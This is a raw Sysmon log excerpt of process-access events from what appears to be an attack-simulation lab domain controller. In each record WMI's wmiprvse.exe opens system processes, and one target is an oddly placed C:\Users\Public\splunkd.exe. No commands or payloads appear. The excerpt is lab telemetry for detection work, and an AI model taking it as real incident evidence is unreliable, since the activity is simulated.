15:59:46.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027799Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027798Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027797Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027796Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027795Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027794Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027793Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.037{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027792Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027791Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027790Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027789Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027788Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027787Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027786Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027785Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027784Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027783Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027782Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027781Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027780Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 